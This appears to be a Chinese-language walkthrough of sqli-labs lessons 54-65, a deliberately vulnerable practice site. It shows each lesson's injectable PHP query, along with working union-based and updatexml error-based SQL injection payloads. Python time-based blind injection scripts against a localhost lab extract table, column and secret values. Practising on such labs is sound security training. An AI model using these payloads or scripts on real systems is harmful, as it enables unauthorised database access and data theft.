Sqli-lab Less54-65 writeup
Basic
show databases; //查看数据库
use xxx; //使用某个数据库
show tables; //查看该数据库的数据表
desc xxx; //查看该数据表的结构
select * from xxx; //查找某个数据表的所有内容
select schema_name from information_schema.schemata; //猜数据库
select table_name from information_schema.tables where table_schema='xxx';//猜某数据库的数据表
Select column_name from information_schema.columns where table_name='xxx';//猜某表的所有列
left(a,b); //从左侧截取 a 的前 b 位
mid(column_name,start[,length]); //从位置start开始,截取column_name字符串的length位,与substr作用相同
substr(string, start, length); //从位置start开始,截取字符串string的length长度,与mid作用相同
ascii(); //将某个字符转换成ascii码
ord(); //将某个字符转换成ascii码,同ascii()
Challenges
Less-54
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
没什么过滤,直接上
0' union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
得到
Your Login name:information_schema,challenges,mysql,performance_schema,security
Your Password:2
爆破表
0' union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
得到
Your Login name:QGVTNCJQK6
Your Password:2
爆破列
0' union select 1,group_concat(column_name),2 from information_schema.columns where table_name='QGVTNCJQK6';%23
得到
Your Login name:id,sessid,secret_9YQQ,tryy
Your Password:2
爆破内容
0' union select id,secret_9YQQ,tryy from QGVTNCJQK6;%23
得到
Your Login name:UEGTp3YhAO1wSaVNixYIWwMl
Your Password:3
Less-55
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
也是没什么过滤,直接上
0) union select 1,group_concat(schema_name),2 from information_schema.schemata;%23
Your Login name:information_schema,challenges,mysql,performance_schema,security
0) union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:HSTKPKBJZX
0) union select 1,group_concat(column_name),2 from information_schema.columns where table_name='HSTKPKBJZX';%23
Your Login name:id,sessid,secret_Y1KS,tryy
0) union select id,secret_Y1KS,tryy from HSTKPKBJZX;%23
Your Login name:BsZ12SElz8qNeK2rvFOTYpkb
Less-56
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
0') union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:70ULR981EI
0') union select 1,group_concat(column_name),2 from information_schema.columns where table_name='70ULR981EI';%23
Your Login name:id,sessid,secret_KPCG,tryy
0') union select id,secret_KPCG,tryy from 70ULR981EI;%23
Your Login name:t8Q1iKTajlerR65fY1P8Lu8I
Less-57
$id= '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
增加了"
0" union select 1,group_concat(table_name),2 from information_schema.tables where table_schema='challenges';%23
Your Login name:28YHZGI481
0" union select 1,group_concat(column_name),2 from information_schema.columns where table_name='28YHZGI481';%23
Your Login name:id,sessid,secret_152D,tryy
0" union select id,secret_152D,tryy from 28YHZGI481;%23
Your Login name:u1TfmRa1qunL2c4bGqZv4H6J
Less-58
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
可以看到,查询结果被用作数组序号,输出被改了,但是mysql_error()被打印了,所以我们可以直接用报错注入
0' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~HG2RC34XP0~'
0' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='HG2RC34XP0'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_7IXP,tryy~'
0' and updatexml(1,concat(0x7e,(select secret_7IXP from HG2RC34XP0),0x7e),1);%23
XPATH syntax error: '~m20SLP9m0za56xuhE7s1awqR~'
Less-59
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
还是按照之前的用报错注入
0 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~EANMX28TXI~'
0 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='EANMX28TXI'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_Z6IM,tryy~'
0 and updatexml(1,concat(0x7e,(select secret_Z6IM from EANMX28TXI),0x7e),1);%23
XPATH syntax error: '~tEwpAjainXQeyDLGeSG1nuok~'
Less-60
$id = '("'.$id.'")';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
直接加上")绕过,依然可以用报错注入
0") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~5OJBK8U9XQ~'
0") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='5OJBK8U9XQ'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_8GHX,tryy~'
0") and updatexml(1,concat(0x7e,(select secret_8GHX from 5OJBK8U9XQ),0x7e),1);%23
XPATH syntax error: '~Ij8p6anZKPghpsC4S5Ti9mgi~'
Less-61
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
直接加上'))绕过,依然可以用报错注入
0')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1);%23
XPATH syntax error: '~MP94IBBMTL~'
0')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='MP94IBBMTL'),0x7e),1);%23
XPATH syntax error: '~id,sessid,secret_QN8H,tryy~'
0')) and updatexml(1,concat(0x7e,(select secret_QN8H from MP94IBBMTL),0x7e),1);%23
XPATH syntax error: '~CieVXfic1dl9FuqHdChc2we3~'
Less-62
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
因为注释了print_r(mysql_error()),无法用报错注入。因为还有尝试次数,只能用延时注入
写了一下 jio 本,写的比较渣
# encoding: utf-8
import requests
import re
index_url = "http://localhost:8081/Less-62/index.php?id="
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
'challenge':'7b4184899f8b788841fb3eaf29177fdc',
'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}
flag = ''
# for i in range(1,11):
# print(i)
# for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
# j = ord(j)
# # payload = "0') or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
# url = index_url + payload
# try:
# r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# # print(r.text)
# except:
# flag += chr(j)
# print(flag)
# break
# flag = 'secret_'
# for i in range(8,12):
# print(i)
# for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
# j = ord(j)
# payload = "0') or if((ascii(substr((select column_name from information_schema.columns where table_name='WMBY8Y9EUL' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
# url = index_url + payload
# try:
# r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# # print(r.text)
# except:
# flag += chr(j)
# print(flag)
# break
#secret_WPTM
for i in range(1,25):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
j = ord(j)
payload = "0') or if((ascii(substr((select secret_WPTM from WMBY8Y9EUL),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
#mtvo4Z0u4wqd0nLRwxnydled
Less-63
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
# encoding: utf-8
import requests
import re
index_url = "http://localhost:8081/Less-63/index.php?id="
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
'challenge':'31a6b5568bbb9c350c1b296d9086acf0',
'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}
flag = ''
table = ''
column = ''
for i in range(1,11):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0' or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
except:
flag += chr(j)
print(flag)
break
table = flag
print("################################# table is %s" % table)
flag = 'secret_'
for i in range(8,12):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0' or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
column = flag
print("################################# column is %s" % column)
flag = ''
for i in range(1,25):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
j = ord(j)
payload = "0' or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
print("################################# key is %s" % flag)
Less-64
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
# encoding: utf-8
import requests
import re
index_url = "http://localhost:8081/Less-64/index.php?id="
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
'challenge':'6efa4aae76d29c330a3636356fa5386c',
'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}
flag = ''
table = ''
column = ''
for i in range(1,11):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0)) or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
except:
flag += chr(j)
print(flag)
break
table = flag
print("################################# table is %s" % table)
flag = 'secret_'
for i in range(8,12):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0)) or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
column = flag
print("################################# column is %s" % column)
flag = ''
for i in range(1,25):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
j = ord(j)
payload = "0)) or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
print("################################# key is %s" % flag)
Less-65
$id = '"'.$id.'"';
// Querry DB to get the correct output
$sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#00FFFF">';
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
// print_r(mysql_error());
echo "</font>";
}
# encoding: utf-8
import requests
import re
index_url = "http://localhost:8081/Less-65/index.php?id="
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36',
}
cookie = {
'challenge':'caf415945acc41218462264d7e211f37',
'PHPSESSID':'a64htnnoo54e99q0005mareng7'
}
flag = ''
table = ''
column = ''
for i in range(1,11):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0\") or if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
except:
flag += chr(j)
print(flag)
break
table = flag
print("################################# table is %s" % table)
flag = 'secret_'
for i in range(8,12):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890':
j = ord(j)
payload = "0\") or if((ascii(substr((select column_name from information_schema.columns where table_name='"+ table +"' limit 2,1),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
column = flag
print("################################# column is %s" % column)
flag = ''
for i in range(1,25):
print(i)
for j in 'QWERTYUIOPASDFGHJKLZXCVBNM1234567890qwertyuiopasdfghjklzxcvbnm':
j = ord(j)
payload = "0\") or if((ascii(substr((select "+ column +" from "+ table +"),"+ str(i) +",1))="+ str(j) +"),sleep(5),0);%23"
url = index_url + payload
try:
r = requests.get(url=url,headers=header,cookies=cookie,timeout=4.5)
# print(r.text)
except:
flag += chr(j)
print(flag)
break
print("################################# key is %s" % flag)